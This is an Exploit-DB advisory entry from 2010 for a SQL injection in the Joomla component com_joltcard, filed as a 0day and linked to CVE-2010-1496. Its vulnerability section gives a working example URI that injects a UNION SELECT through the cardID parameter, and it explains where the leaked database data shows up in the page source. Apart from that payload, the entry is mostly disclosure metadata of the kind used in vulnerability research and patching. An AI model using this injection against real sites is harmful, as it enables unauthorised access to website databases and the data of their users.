Lucene search
ValentinEDB-ID:12269HistoryApr 16, 2010 - 12:00 a.m.
Joomla! Component JoltCard 1.2.1 - SQL Injection
2010-04-1600:00:00
Valentin
www.exploit-db.com
26
AI Score
7.4
Confidence
Low
# Exploit Title: Joomla Component com_joltcard SQL Injection Vulnerability
# Date: 17.04.2010
# Author: Valentin
# Category: webapps/0day
# Version: unknown
# Tested on:
# CVE :
# Code :
[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
|:: >> General Information
|:: Advisory/Exploit Title = Joomla Component com_joltcard SQL Injection Vulnerability
|:: Author = Valentin Hoebel
|:: Contact = [email protected]
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
|:: >> Product information
|:: Name = com_joltcard
|:: Vendor = JOLT media
|:: Vendor Website = http://jolt.ca/
|:: Affected Version(s) = unknown
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
|:: >> #1 Vulnerability
|:: Type = SQL Injection
|:: Vulnerable Parameter(s) = cardID
|:: Example URI = index.php?option=com_joltcard&Itemid=XX&task=view&cardID=X+AND+1=2+UNION+SELECT+concat(database())--
|:: Selected information gets only displayed within the HTML source code (look at <OBJECT> tag).
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
|:: >> Additional Information
|:: Advisory/Exploit Published = 17.04.2010
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
|:: >> Misc
|:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
|::
|::
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]Related
cvelist
cvelist
CVE-2010-1496
2010-04-23 14:00:00
cve
cve
CVE-2010-1496
2010-04-23 14:30:01
prion
prion
Sql injection
2010-04-23 14:30:00
nvd
nvd
CVE-2010-1496
2010-04-23 14:30:01